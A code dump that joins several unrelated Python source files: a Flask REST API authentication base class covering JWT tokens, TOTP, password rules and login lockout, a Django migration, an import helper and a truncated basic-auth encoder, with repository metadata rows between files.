                    # it can be something like: ['IP1, IP2']
                    return str(forwarded_ips[0].split(",")[0].strip())
            # Standard (and more secure) way to obtain remote IP
            else:
                header_key = "X-Real-Ip"
                # in testing mode X-Forwarded-For is used
                if real_ip := request.headers.get(header_key):  # pragma: no cover
                    return real_ip

            if raise_warnings and PRODUCTION and not TESTING:  # pragma: no cover
                log.warning(
                    "Production mode is enabled, but {} header is missing", header_key
                )

            if request.remote_addr:
                return request.remote_addr

        # Raised when get_remote_ip is executed outside request context
        # For example when creating tokens in initialize_testing_environment
        except RuntimeError as e:
            log.debug(e)

        # Mocked IP to prevent tests failures when fn executed outside Flask context
        return "0.0.0.0"
@staticmethod
@lru_cache
def localize_ip(ip: str) -> Optional[str]:
try:
data = mem.geo_reader.get(ip)
if data is None:
return None
if "country" in data:
try:
c = data["country"]["names"]["en"]
return c # type: ignore
except Exception: # pragma: no cover
log.error("Missing country.names.en in {}", data)
return None
if "continent" in data: # pragma: no cover
try:
c = data["continent"]["names"]["en"]
return c # type: ignore
except Exception:
log.error("Missing continent.names.en in {}", data)
return None
return None # pragma: no cover
except Exception as e:
log.error("{}. Input was {}", e, ip)
return None
# ###################
# # Tokens handling #
# ###################
    @classmethod
    def create_token(cls, payload: Payload) -> str:
        """Generate a str token with JWT library to encrypt the payload"""
        # Signed (not encrypted) with the server-wide secret using HS512
        return jwt.encode(
            cast(Dict[str, Any], payload), cls.JWT_SECRET, algorithm=cls.JWT_ALGO
        )
def create_temporary_token(
self, user: User, token_type: str, duration: int = 86400
) -> Tuple[str, Payload]:
# invalidate previous tokens with same token_type
for t in self.get_tokens(user=user):
ttype = t.get("token_type")
if ttype is None: # pragma: no cover
continue
if ttype != token_type:
continue
tok = t.get("token")
if tok and self.invalidate_token(tok):
log.info("Previous token invalidated: {}", tok)
expiration = datetime.now(pytz.utc) + timedelta(seconds=duration)
payload, full_payload = self.fill_payload(
user, expiration=expiration, token_type=token_type
)
token = self.create_token(payload)
return token, full_payload
@classmethod
def unpack_token(
cls, token: str, raiseErrors: bool = False
) -> Optional[DecodedPayload]:
try:
return cast(
DecodedPayload,
jwt.decode(token, cls.JWT_SECRET, algorithms=[cls.JWT_ALGO]),
)
# now > exp
except ExpiredSignatureError as e:
# should this token be invalidated into the DB?
if raiseErrors:
raise e
else:
log.info("Unable to decode JWT token. {}", e)
# now < nbf
except ImmatureSignatureError as e:
if raiseErrors:
raise e
else:
log.info("Unable to decode JWT token. {}", e)
except Exception as e:
if raiseErrors:
raise e
else:
log.warning("Unable to decode JWT token. {}", e)
return None
@staticmethod
def unpacked_token(
valid: bool,
token: Optional[str] = None,
jti: Optional[str] = None,
user: Optional[User] = None,
) -> Tuple[bool, Optional[str], Optional[str], Optional[User]]:
return (valid, token, jti, user)
    def verify_token(
        self,
        token: Optional[str],
        raiseErrors: bool = False,
        token_type: Optional[str] = None,
    ) -> Tuple[bool, Optional[str], Optional[str], Optional[User]]:
        """Fully validate a token: decode, check type, user and backend validity.

        Returns (valid, token, jti, user); with raiseErrors=True an
        InvalidToken is raised instead of returning an invalid tuple.
        token_type defaults to FULL_TOKEN when not provided.
        """
        if token is None:
            if raiseErrors:
                raise InvalidToken("Missing token")
            return self.unpacked_token(False)

        # Decode the current token
        payload = self.unpack_token(token, raiseErrors=raiseErrors)
        if payload is None:
            if raiseErrors:
                raise InvalidToken("Invalid payload")  # pragma: no cover
            return self.unpacked_token(False)

        # Tokens without a "t" claim are treated as full tokens
        payload_type = payload.get("t", self.FULL_TOKEN)

        if token_type is None:
            token_type = self.FULL_TOKEN

        if token_type != payload_type:
            log.error("Invalid token type {}, required: {}", payload_type, token_type)
            if raiseErrors:
                raise InvalidToken("Invalid token type")
            return self.unpacked_token(False)

        user_id = payload.get("user_id")
        # Get the user from payload
        user = self.get_user(user_id=user_id)
        if user is None:
            if raiseErrors:
                raise InvalidToken("No user from payload")
            return self.unpacked_token(False)

        # implemented from the specific db services
        if not self.verify_token_validity(jti=payload["jti"], user=user):
            if raiseErrors:
                raise InvalidToken("Token is not valid")
            return self.unpacked_token(False)

        log.debug("User {} is authorized", user.email)

        return self.unpacked_token(True, token=token, jti=payload["jti"], user=user)
    def fill_payload(
        self,
        user: User,
        expiration: Optional[datetime] = None,
        token_type: Optional[str] = None,
    ) -> Tuple[Payload, Payload]:
        """Informations to store inside the JWT token,
        starting from the user obtained from the current service

        Claim attributes listed here:
        http://blog.apcelent.com/json-web-token-tutorial-example-python.html

        TTL is measured in seconds
        """

        payload: Payload = {"user_id": user.uuid, "jti": getUUID()}
        full_payload: Payload = payload.copy()

        if not token_type:
            token_type = self.FULL_TOKEN

        # Special-purpose ("short") tokens carry the type claim in the
        # encoded payload too, so they cannot be used as full tokens
        short_token = False
        if token_type in (
            self.PWD_RESET,
            self.ACTIVATE_ACCOUNT,
            self.UNLOCK_CREDENTIALS,
        ):
            short_token = True
            payload["t"] = token_type

        full_payload["t"] = token_type

        now = datetime.now(pytz.utc)
        if expiration is None:
            expiration = now + timedelta(seconds=self.DEFAULT_TOKEN_TTL)

        full_payload["iat"] = now
        full_payload["nbf"] = now  # you may add a timedelta
        full_payload["exp"] = expiration

        # Full tokens also embed the time claims so jwt.decode can enforce them
        if not short_token:
            payload["iat"] = full_payload["iat"]
            payload["nbf"] = full_payload["nbf"]
            payload["exp"] = full_payload["exp"]

        # first used for encoding
        # second used to store information on backend DB
        return payload, full_payload
    # ###############################
    # ##### Roles handling ######
    # ###############################

    # Convenience wrappers around verify_roles for the built-in roles

    def is_admin(self, user: User) -> bool:
        """Check if current user has Administration role"""
        return self.verify_roles(user, [Role.ADMIN], warnings=False)

    def is_staff(self, user: User) -> bool:
        """Check if current user has Staff role"""
        return self.verify_roles(user, [Role.STAFF], warnings=False)

    def is_coordinator(self, user: User) -> bool:
        """Check if current user has Coordinator role"""
        return self.verify_roles(user, [Role.COORDINATOR], warnings=False)
def verify_roles(
self,
user: User,
roles: Optional[List[Union[str, Role]]],
required_roles: str = ALL_ROLES,
warnings: bool = True,
) -> bool:
if not roles:
return True
current_roles = self.get_roles_from_user(user)
if required_roles == ALL_ROLES:
for role in roles:
if isinstance(role, Role):
role = role.value
if role not in current_roles:
if warnings:
log.warning("Auth role '{}' missing for request", role)
return False
return True
if required_roles == ANY_ROLE:
for role in roles:
if isinstance(role, Role):
role = role.value
if role in current_roles:
return True
log.warning(
"Expected at least one roles from {}, found none in {}",
roles,
current_roles,
)
return False
log.critical("Unknown role authorization requirement: {}", required_roles)
return False
    @staticmethod
    def custom_user_properties_pre(
        userdata: Dict[str, Any]
    ) -> Tuple[Dict[str, Any], Dict[str, Any]]:
        """Apply project-level customization to userdata before user creation.

        Returns the (possibly modified) userdata plus any extra data the
        customizer extracted. Email is always normalized to lower case.
        """
        try:
            userdata, extradata = mem.customizer.custom_user_properties_pre(userdata)
        except RestApiException:  # pragma: no cover
            raise
        except Exception as e:  # pragma: no cover
            raise BadRequest(f"Unable to pre-customize user properties: {e}")

        if "email" in userdata:
            userdata["email"] = userdata["email"].lower()

        return userdata, extradata
    @staticmethod
    def custom_user_properties_post(
        user: User, userdata: Props, extra_userdata: Props, db: "Connector"
    ) -> Props:
        """Apply project-level customization after the user has been created."""
        try:
            mem.customizer.custom_user_properties_post(
                user, userdata, extra_userdata, db
            )
        except RestApiException:  # pragma: no cover
            raise
        except Exception as e:  # pragma: no cover
            raise BadRequest(f"Unable to post-customize user properties: {e}")

        return userdata
    # ###########################
    # # Login attempts handling #
    # ###########################

    def register_failed_login(self, username: str, user: Optional[User]) -> None:
        """Record a failed login and, on reaching the limit, block the account.

        When the maximum number of failures is reached and the user is
        known, an unlock token is emitted and a notification email is sent.
        """
        self.save_login(username, user, failed=True)

        if self.MAX_LOGIN_ATTEMPTS == 0:
            log.debug("Failed login are not considered in this configuration")
            return

        if self.count_failed_login(username) < self.MAX_LOGIN_ATTEMPTS:
            return

        log.error(
            "Reached the maximum number of failed login, account {} is blocked",
            username,
        )

        if user:
            # Import here to prevent circular dependencies
            from restapi.connectors.smtp.notifications import notify_login_block

            unlock_token, payload = self.create_temporary_token(
                user, self.UNLOCK_CREDENTIALS
            )
            self.save_token(
                user, unlock_token, payload, token_type=self.UNLOCK_CREDENTIALS
            )
            server_url = get_frontend_url()
            # Dots are not URL-safe in this frontend route; swapped for '+'
            rt = unlock_token.replace(".", "+")
            url = f"{server_url}/app/login/unlock/{rt}"
            failed_logins = self.get_logins(username, only_unflushed=True)
            # NOTE(review): timedelta.seconds drops whole days — presumably ban
            # times are always < 24h; confirm, otherwise use total_seconds()
            notify_login_block(
                user,
                reversed(failed_logins),
                self.FAILED_LOGINS_EXPIRATION.seconds,
                url,
            )
def count_failed_login(self, username: str) -> int:
failed_logins = self.get_logins(username, only_unflushed=True)
if not failed_logins:
return 0
last_failed = failed_logins[-1]
exp = last_failed.date + self.FAILED_LOGINS_EXPIRATION
if get_now(exp.tzinfo) > exp:
self.flush_failed_logins(username)
return 0
return len(failed_logins)
    def get_totp_secret(self, user: User) -> str:
        """Return the user's TOTP secret, creating and storing one if missing.

        The secret is stored Fernet-encrypted in user.mfa_hash and
        decrypted on every access. Raises ServerError if decryption fails.
        """
        if TESTING:  # pragma: no cover
            # TESTING_TOTP_HASH is set by setup-cypress github action
            if p := Env.get("AUTH_TESTING_TOTP_HASH", ""):
                return p

        if not user.mfa_hash:
            random_hash = pyotp.random_base32()
            user.mfa_hash = self.fernet.encrypt(random_hash.encode()).decode()
            self.save_user(user)

        try:
            return self.fernet.decrypt(user.mfa_hash.encode()).decode()
        # to test this exception change the fernet key used to encrypt mfa_hash
        except InvalidFernetToken:
            raise ServerError("Invalid server signature")
def verify_totp(self, user: User, totp_code: Optional[str]) -> bool:
if totp_code is None:
raise Unauthorized("Verification code is missing")
secret = self.get_totp_secret(user)
totp = pyotp.TOTP(secret)
if not totp.verify(totp_code, valid_window=self.TOTP_VALIDITY_WINDOW):
self.log_event(
Events.failed_login,
payload={"totp": totp_code},
user=user,
)
self.register_failed_login(user.email, user=user)
raise Unauthorized("Verification code is not valid")
return True
def get_qrcode(self, user: User) -> str:
secret = self.get_totp_secret(user)
totp = pyotp.TOTP(secret)
project_name = get_project_configuration("project.title", "No project name")
otpauth_url = totp.provisioning_uri(project_name)
qr_url = segno.make(otpauth_url)
qr_stream = BytesIO()
qr_url.save(qr_stream, kind="png", scale=5)
return base64.b64encode(qr_stream.getvalue()).decode("utf-8")
def verify_password_strength(
self, pwd: str, old_pwd: Optional[str], email: str, name: str, surname: str
) -> Tuple[bool, str]:
if old_pwd:
if pwd == old_pwd:
return False, "The new password cannot match the previous password"
# in case old_pwd is a hash
if self.verify_password(pwd, old_pwd):
return False, "The new password cannot match the previous password"
if len(pwd) < self.MIN_PASSWORD_LENGTH:
MIN = self.MIN_PASSWORD_LENGTH
return False, f"Password is too short, use at least {MIN} characters"
if not re.search("[a-z]", pwd):
return False, "Password is too weak, missing lower case letters"
if not re.search("[A-Z]", pwd):
return False, "Password is too weak, missing upper case letters"
if not re.search("[0-9]", pwd):
return False, "Password is too weak, missing numbers"
special_characters = "[^a-zA-Z0-9]"
if not re.search(special_characters, pwd):
return False, "Password is too weak, missing special characters"
MIN_CONTAINED_LEN = 3
p_lower = pwd.lower()
if len(name) > MIN_CONTAINED_LEN and name.lower() in p_lower:
return False, "Password is too weak, can't contain your name"
if len(surname) > MIN_CONTAINED_LEN and surname.lower() in p_lower:
return False, "Password is too weak, can't contain your name"
cleaner = r"[\.|_]"
email_clean = re.sub(cleaner, "", email.lower().split("@")[0])
p_clean = re.sub(cleaner, "", p_lower.lower())
if len(email_clean) > MIN_CONTAINED_LEN and email_clean in p_clean:
return False, "Password is too weak, can't contain your email address"
return True, ""
    def change_password(
        self,
        user: User,
        password: str,
        new_password: Optional[str],
        password_confirm: Optional[str],
    ) -> bool:
        """Change the user's password and invalidate all existing tokens.

        Validates confirmation and strength, stores the new hash, updates
        last_password_change and logs the event. Always returns True (all
        failure paths raise BadRequest/Conflict).
        """
        if new_password is None:
            raise BadRequest("Missing new password")

        if password_confirm is None:
            raise BadRequest("Missing password confirmation")

        if new_password != password_confirm:
            raise Conflict("Your password doesn't match the confirmation")

        check, msg = self.verify_password_strength(
            pwd=new_password,
            old_pwd=password,
            email=user.email,
            name=user.name,
            surname=user.surname,
        )

        if not check:
            raise Conflict(msg)

        user.password = BaseAuthentication.get_password_hash(new_password)
        user.last_password_change = datetime.now(pytz.utc)
        self.save_user(user)

        self.log_event(Events.change_password, user=user)

        # Force re-login everywhere: drop every token the user still holds
        for token in self.get_tokens(user=user):
            try:
                self.invalidate_token(token=token["token"])
            except Exception as e:  # pragma: no cover
                log.critical("Failed to invalidate token {}", e)

        return True
    def check_password_validity(
        self, user: User, totp_authentication: bool
    ) -> Dict[str, List[str]]:
        """Report required follow-up actions for the user's password.

        Returns a message dict with "actions" and "errors" lists (plus a
        "qr_code" entry on first login with TOTP enabled).
        """
        # ##################################################
        # Check if something is missing in the authentication and ask additional actions
        # raises exceptions in case of errors
        message: Dict[str, List[str]] = {"actions": [], "errors": []}

        # A never-changed password is represented as EPOCH
        last_pwd_change = user.last_password_change
        if last_pwd_change is None or last_pwd_change == 0:
            last_pwd_change = EPOCH

        if self.FORCE_FIRST_PASSWORD_CHANGE and last_pwd_change == EPOCH:
            message["actions"].append("FIRST LOGIN")
            message["errors"].append("Please change your temporary password")
            self.log_event(Events.password_expired, user=user)

            if totp_authentication:
                message["qr_code"] = [self.get_qrcode(user)]

        elif self.MAX_PASSWORD_VALIDITY:
            valid_until = last_pwd_change + self.MAX_PASSWORD_VALIDITY

            # offset-naive datetime to compare with MySQL
            now = get_now(last_pwd_change.tzinfo)

            expired = last_pwd_change == EPOCH or valid_until < now

            if expired:
                message["actions"].append("PASSWORD EXPIRED")
                message["errors"].append("Your password is expired, please change it")
                self.log_event(Events.password_expired, user=user)

        return message
def verify_blocked_username(self, username: str) -> None:
# We do not count failed logins
if self.MAX_LOGIN_ATTEMPTS <= 0:
return
# We register failed logins but the user does not reached it yet
if self.count_failed_login(username) < self.MAX_LOGIN_ATTEMPTS:
return
self.log_event(
Events.refused_login,
payload={
"username": username,
"motivation": "account blocked due to too many failed logins",
},
)
# Dear user, you have exceeded the limit!
raise Forbidden(
"Sorry, this account is temporarily blocked "
"due to the number of failed login attempts."
)
    @classmethod
    def verify_user_status(cls, user: User) -> None:
        """Raise Forbidden when the account is inactive, dormant or expired."""
        if not user.is_active:
            cls.log_event(
                Events.refused_login,
                payload={"username": user.email, "motivation": "account not active"},
            )

            # Beware, frontend leverages on this exact message,
            # do not modified it without fix also on frontend side
            raise Forbidden("Sorry, this account is not active")

        now: Optional[datetime] = None

        if cls.DISABLE_UNUSED_CREDENTIALS_AFTER and user.last_login:
            if TESTING and user.email == cls.default_user:
                log.info("Default user can't be blocked for inactivity during tests")
            else:
                now = get_now(user.last_login.tzinfo)

                if user.last_login + cls.DISABLE_UNUSED_CREDENTIALS_AFTER < now:
                    cls.log_event(
                        Events.refused_login,
                        payload={
                            "username": user.email,
                            "motivation": "account blocked due to inactivity",
                        },
                    )
                    raise Forbidden("Sorry, this account is blocked for inactivity")

        if user.expiration:
            # Reuse the now instance, if previously inizialized
            # tzinfo should be the same for both last_login and expiration fields
            if not now:
                now = get_now(user.expiration.tzinfo)

            if user.expiration < now:
                cls.log_event(
                    Events.refused_login,
                    payload={"username": user.email, "motivation": "account expired"},
                )
                raise Forbidden("Sorry, this account is expired")
    # Mostly copied in definition.py
    @classmethod
    def log_event(
        cls,
        event: Events,
        target: Optional[Any] = None,
        payload: Optional[Dict[str, Any]] = None,
        user: Optional[Any] = None,
    ) -> None:
        """Persist an audit-log entry enriched with client IP and request path."""
        try:
            url_path = request.path
        # Raised when executed outside a Flask request context
        except RuntimeError:
            url_path = "-"

        save_event_log(
            event=event,
            payload=payload,
            user=user,
            target=target,
            ip=cls.get_remote_ip(),
            url=url_path,
        )
    def init_auth_db(self, options: Dict[str, bool]) -> None:
        """Initialize roles, the default group and the default user.

        options may contain force_group / force_user flags to re-create or
        update the default entities even when others already exist.
        """
        self.init_roles()

        default_group = self.init_groups(force=options.get("force_group", False))

        self.init_users(
            default_group, self.roles, force=options.get("force_user", False)
        )
    def init_roles(self) -> None:
        """Create or update the configured roles in the auth backend."""
        current_roles = {role.name: role for role in self.get_roles()}

        # NOTE(review): roles_data.values() are the role *descriptions* (keys
        # cannot duplicate in a dict), yet the message says "role names" —
        # confirm whether duplicate descriptions are really the intended check
        role_names = list(self.roles_data.values())
        num_of_roles = len(role_names)
        num_of_unique_roles = len(list(set(role_names)))
        if num_of_roles != num_of_unique_roles:
            print_and_exit("Found duplicated role names: {}", str(sorted(role_names)))

        for role_name in self.roles:
            description = self.roles_data.get(role_name, ROLE_DISABLED)
            if r := current_roles.get(role_name):
                if r.description == description:
                    log.info("Role {} already exists", role_name)
                else:
                    log.info("Role {} already exists, updating description", role_name)
                    r.description = description
                    self.save_role(r)
            else:
                log.info("Creating role: {}", role_name)
                self.create_role(name=role_name, description=description)

        # Roles in the backend but not in the configuration are only reported
        for r in current_roles:
            if r not in self.roles:
                log.warning("Unknown role found: {}", r)
    def init_groups(self, force: bool) -> Group:
        """Ensure the default group exists (created/updated per the force flag).

        NOTE(review): when groups exist, force is False and the default group
        is absent, this falls through and returns None despite the Group
        annotation — confirm callers tolerate that.
        """
        create = False
        update = False

        default_group = self.get_group(name=DEFAULT_GROUP_NAME)

        # If there are no groups, let's create the default group
        if not self.get_groups():
            create = True
        # If there are some groups skip group creation in absence of a force flag
        elif force:
            # If force flag is enable, create the default group if missing or update it
            create = default_group is None
            update = default_group is not None

        if create:
            default_group = self.create_group(
                {
                    "shortname": DEFAULT_GROUP_NAME,
                    "fullname": DEFAULT_GROUP_DESCR,
                }
            )
            log.info("Injected default group")
        elif update:
            log.info("Default group already exists, updating")
            # Added to make the life easier to mypy... but cannot be False
            if default_group:
                default_group.shortname = DEFAULT_GROUP_NAME
                default_group.fullname = DEFAULT_GROUP_DESCR
            else:  # pragma: no cover
                log.critical("Default group not found")
            self.save_group(default_group)
        elif default_group:
            log.info("Default group already exists")
        else:
            log.info("Default group does not exist but other groups do")

        return default_group
    def init_users(self, default_group: Group, roles: List[str], force: bool) -> User:
        """Ensure the default user exists and every user belongs to a group.

        Mirrors init_groups: creation when no users exist, create-or-update
        when force is set. Finally assigns any group-less user to the
        default group.
        """
        create = False
        update = False

        default_user = self.get_user(username=self.default_user)

        # If there are no users, let's create the default user
        if not self.get_users():
            create = True
        # If there are some users skip user creation in absence of a force flag
        elif force:
            # If force flag is enable, create the default user if missing or update it
            create = default_user is None
            update = default_user is not None

        # A None last_password_change forces the first-login password change
        if self.FORCE_FIRST_PASSWORD_CHANGE:
            last_password_change = None
        else:
            last_password_change = datetime.now(pytz.utc)

        if create:
            default_user = self.create_user(
                {
                    "email": self.default_user,
                    "name": "Default",
                    "surname": "User",
                    "password": self.default_password,
                    "last_password_change": last_password_change,
                },
                roles=roles,
            )
            self.add_user_to_group(default_user, default_group)
            # This is required to execute the commit on sqlalchemy...
            self.save_user(default_user)
            log.info("Injected default user")
        elif update:
            # Added to make the life easier to mypy... but cannot be False
            if default_user:
                log.info("Default user already exists, updating")
                default_user.email = self.default_user
                default_user.name = "Default"
                default_user.surname = "User"
                default_user.password = self.get_password_hash(self.default_password)
                default_user.last_password_change = last_password_change
                self.link_roles(default_user, roles)
                self.add_user_to_group(default_user, default_group)
                self.save_user(default_user)
            else:  # pragma: no cover
                log.critical("Default user not found")
        elif default_user:
            log.info("Default user already exists")
        else:
            log.info("Default user does not exist but other users do")

        # Assign all users without a group to the default group
        for user in self.get_users():
            if not user.belongs_to:
                self.add_user_to_group(user, default_group)

        return default_user
    # ########################
    # # Abstract methods # #
    # ########################

    # Backend-specific persistence primitives: every concrete authentication
    # service (sqlalchemy, neo4j, ...) must implement these.

    @abstractmethod
    def get_user(
        self, username: Optional[str] = None, user_id: Optional[str] = None
    ) -> Optional[User]:
        """
        How to retrieve a single user from the current authentication db,
        based on the unique username or the user_id
        return None if no filter parameter is given
        """
        ...

    @abstractmethod
    def get_users(self) -> List[User]:
        """
        How to retrieve a list of all users from the current authentication db
        """
        ...

    @abstractmethod
    def save_user(self, user: User) -> bool:
        # log.error("Users are not saved in base authentication")
        ...

    @abstractmethod
    def delete_user(self, user: User) -> bool:
        # log.error("Users are not deleted in base authentication")
        ...

    @abstractmethod
    def get_group(
        self, group_id: Optional[str] = None, name: Optional[str] = None
    ) -> Optional[Group]:
        """
        How to retrieve a single group from the current authentication db
        """
        ...

    @abstractmethod
    def get_groups(self) -> List[Group]:
        """
        How to retrieve groups list from the current authentication db
        """
        ...

    @abstractmethod
    def get_user_group(self, user: User) -> Group:
        """
        How to retrieve the group that the user belongs to from the current auth db
        """
        ...

    @abstractmethod
    def get_group_members(self, group: Group) -> List[User]:
        """
        How to retrieve group users list from the current authentication db
        """
        ...

    @abstractmethod
    def save_group(self, group: Group) -> bool:
        ...

    @abstractmethod
    def delete_group(self, group: Group) -> bool:
        ...

    @abstractmethod
    def get_tokens(
        self,
        user: Optional[User] = None,
        token_jti: Optional[str] = None,
        get_all: bool = False,
    ) -> List[Token]:
        """
        Return the list of tokens
        """
        ...

    @abstractmethod
    def verify_token_validity(self, jti: str, user: User) -> bool:
        """
        This method MUST be implemented by specific Authentication Methods
        to add more specific validation contraints
        """
        ...

    @abstractmethod
    def save_token(
        self, user: User, token: str, payload: Payload, token_type: Optional[str] = None
    ) -> None:
        # NOTE(review): unlike the other stubs this abstract carries a real
        # body (a debug log) — presumably intentional, confirm
        log.debug("Tokens is not saved in base authentication")

    @abstractmethod
    def invalidate_token(self, token: str) -> bool:
        """
        With this method the specified token must be invalidated
        as expected after a user logout
        """
        ...

    @abstractmethod
    def get_roles(self) -> List[RoleObj]:
        """
        How to retrieve all the roles
        """
        ...

    @abstractmethod
    def get_roles_from_user(self, user: Optional[User]) -> List[str]:
        """
        Retrieve roles from a user object from the current auth service
        """
        ...

    @abstractmethod
    def create_role(self, name: str, description: str) -> None:
        """
        A method to create a new role
        """
        ...

    @abstractmethod
    def save_role(self, role: RoleObj) -> bool:
        ...

    # ################
    # # Create Users #
    # ################

    @abstractmethod
    def create_user(self, userdata: Dict[str, Any], roles: List[str]) -> User:
        """
        A method to create a new user
        """
        ...

    @abstractmethod
    def link_roles(self, user: User, roles: List[str]) -> None:
        """
        A method to assign roles to a user
        """
        ...

    @abstractmethod
    def create_group(self, groupdata: Dict[str, Any]) -> Group:
        """
        A method to create a new group
        """
        ...

    @abstractmethod
    def add_user_to_group(self, user: User, group: Group) -> None:
        """
        Save the group.members -> user relationship
        """
        ...

    @abstractmethod
    def save_login(self, username: str, user: Optional[User], failed: bool) -> None:
        """
        Save login information
        """
        ...

    @abstractmethod
    def get_logins(
        self, username: Optional[str] = None, only_unflushed: bool = False
    ) -> List[Login]:
        """
        Save login information
        """
        ...

    @abstractmethod
    def flush_failed_logins(self, username: str) -> None:
        """
        Flush failed logins for the give username
        """
        ...
class NoAuthentication(BaseAuthentication):  # pragma: no cover
    """Null-object backend used when authentication is disabled.

    Read operations return empty results, write operations return False or
    None, and operations that cannot be meaningfully stubbed raise
    NotImplementedError.
    """

    # Also used by POST user
    def create_user(self, userdata: Dict[str, Any], roles: List[str]) -> User:
        raise NotImplementedError("Create User not implemented with No Authentication")

    def link_roles(self, user: User, roles: List[str]) -> None:
        return None

    def create_group(self, groupdata: Dict[str, Any]) -> Group:
        raise NotImplementedError("Create Group not implemented with No Authentication")

    def add_user_to_group(self, user: User, group: Group) -> None:
        return None

    def get_user(
        self, username: Optional[str] = None, user_id: Optional[str] = None
    ) -> Optional[User]:
        return None

    def get_users(self) -> List[User]:
        return []

    def save_user(self, user: User) -> bool:
        return False

    def delete_user(self, user: User) -> bool:
        return False

    def get_group(
        self, group_id: Optional[str] = None, name: Optional[str] = None
    ) -> Optional[Group]:
        return None

    def get_groups(self) -> List[Group]:
        return []

    def get_user_group(self, user: User) -> Group:
        raise NotImplementedError("Get Group not implemented with No Authentication")

    def get_group_members(self, group: Group) -> List[User]:
        return []

    def save_group(self, group: Group) -> bool:
        return False

    def delete_group(self, group: Group) -> bool:
        return False

    def get_roles(self) -> List[RoleObj]:
        return []

    def get_roles_from_user(self, user: Optional[User]) -> List[str]:
        return []

    def create_role(self, name: str, description: str) -> None:
        return None

    def save_role(self, role: RoleObj) -> bool:
        return False

    def save_token(
        self, user: User, token: str, payload: Payload, token_type: Optional[str] = None
    ) -> None:
        return None

    def verify_token_validity(self, jti: str, user: User) -> bool:
        return False

    def get_tokens(
        self,
        user: Optional[User] = None,
        token_jti: Optional[str] = None,
        get_all: bool = False,
    ) -> List[Token]:
        return []

    def invalidate_token(self, token: str) -> bool:
        return False

    def save_login(self, username: str, user: Optional[User], failed: bool) -> None:
        return None

    def get_logins(
        self, username: Optional[str] = None, only_unflushed: bool = False
    ) -> List[Login]:
        raise NotImplementedError("Get Login not implemented with No Authentication")

    def flush_failed_logins(self, username: str) -> None:
        return None
| 31.809129 | 88 | 0.592791 |
f8571344edc69dc4b19f2efa009b42cb8128dfd5 | 393 | py | Python | landing/migrations/0007_auto_20210416_1917.py | cactus-computing/product-recommendation | b5d9bb27205a4fb032fd19934ecab56a5a8c6d81 | [
"MIT"
] | null | null | null | landing/migrations/0007_auto_20210416_1917.py | cactus-computing/product-recommendation | b5d9bb27205a4fb032fd19934ecab56a5a8c6d81 | [
"MIT"
] | null | null | null | landing/migrations/0007_auto_20210416_1917.py | cactus-computing/product-recommendation | b5d9bb27205a4fb032fd19934ecab56a5a8c6d81 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.4 on 2021-04-16 19:17
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a ``created_at`` timestamp to the ``contact`` model."""

    # Applies on top of the previous auto-generated migration of "landing".
    dependencies = [
        ('landing', '0006_auto_20210416_1817'),
    ]

    operations = [
        migrations.AddField(
            model_name='contact',
            name='created_at',
            # NOTE(review): auto_now=True updates the field on *every* save;
            # for a pure creation timestamp auto_now_add=True is the usual
            # choice — confirm intent before changing (would need a new
            # migration, not an edit to this one).
            field=models.DateTimeField(auto_now=True),
        ),
    ]
| 20.684211 | 54 | 0.605598 |
51e6f4f88ed90bde22dd3cf737d51770b60491da | 658 | py | Python | amplify/agent/util/loader.py | digideskio/digidesk-amplified | 547f899d6fd47dc726df28ee90bf3511f02bd6cf | [
"BSD-2-Clause"
] | null | null | null | amplify/agent/util/loader.py | digideskio/digidesk-amplified | 547f899d6fd47dc726df28ee90bf3511f02bd6cf | [
"BSD-2-Clause"
] | null | null | null | amplify/agent/util/loader.py | digideskio/digidesk-amplified | 547f899d6fd47dc726df28ee90bf3511f02bd6cf | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
__author__ = "Mike Belov"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__credits__ = ["Mike Belov", "Andrei Belov", "Ivan Poluyanov", "Oleg Mamontov", "Andrew Alexeev"]
__license__ = ""
__maintainer__ = "Mike Belov"
__email__ = "dedm@nginx.com"
def import_class(klass):
    """Import and return the object named by a fully qualified dotted path.

    Args:
        klass: Dotted path such as ``"package.module.ClassName"``.

    Returns:
        The attribute (typically a class) named by the last path component.

    Raises:
        ImportError: if the module part cannot be imported.
        AttributeError: if the module has no such attribute.
    """
    # importlib resolves the (possibly dotted) module path directly,
    # replacing the hand-rolled __import__/getattr walk.
    import importlib

    module_name, _, class_name = klass.rpartition('.')
    module = importlib.import_module(module_name)
    return getattr(module, class_name)
def import_module(name):
    """Import ``name`` and return the *leaf* module.

    Unlike bare ``__import__`` (which returns the top-level package for a
    dotted name), this returns the innermost module: for example,
    ``import_module("a.b.c")`` returns module ``c``.
    """
    # importlib.import_module already returns the leaf module, so the
    # manual getattr walk over the dotted components is unnecessary.
    import importlib

    return importlib.import_module(name)
| 27.416667 | 97 | 0.656535 |
def8b0aec954f6cdbd24d74e37b1af7436efa0a7 | 1,442 | py | Python | conductor/conductor/common/utils/basic_auth_util.py | onap/optf-has | dd06e2675aedd7ae6344f2f51e70bbd468f36ce5 | [
"Apache-2.0"
] | 4 | 2019-02-14T19:18:09.000Z | 2019-10-21T17:17:59.000Z | conductor/conductor/common/utils/basic_auth_util.py | onap/optf-has | dd06e2675aedd7ae6344f2f51e70bbd468f36ce5 | [
"Apache-2.0"
] | null | null | null | conductor/conductor/common/utils/basic_auth_util.py | onap/optf-has | dd06e2675aedd7ae6344f2f51e70bbd468f36ce5 | [
"Apache-2.0"
] | 4 | 2019-05-09T07:05:54.000Z | 2020-11-20T05:56:47.000Z | #
# -------------------------------------------------------------------------
# Copyright (c) 2015-2018 AT&T Intellectual Property
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -------------------------------------------------------------------------
#
import base64
from conductor.i18n import _, _LI, _LE
from oslo_log import log
LOG = log.getLogger(__name__)
def encode(user_id, password):
    """Build an HTTP Basic Authentication header value.

    Args:
        user_id: The user name.
        password: The password.

    Returns:
        str: ``"Basic <base64(user_id:password)>"`` suitable as the value
        of an ``Authorization`` header.
    """
    user_pass = user_id + ":" + password
    # base64.b64encode operates on bytes, so encode the credentials first
    # and decode the result back to str for the header value.
    base64_val = base64.b64encode(user_pass.encode()).decode()
    # Fix: the original wrapped this in _LE(), the oslo.i18n *log error*
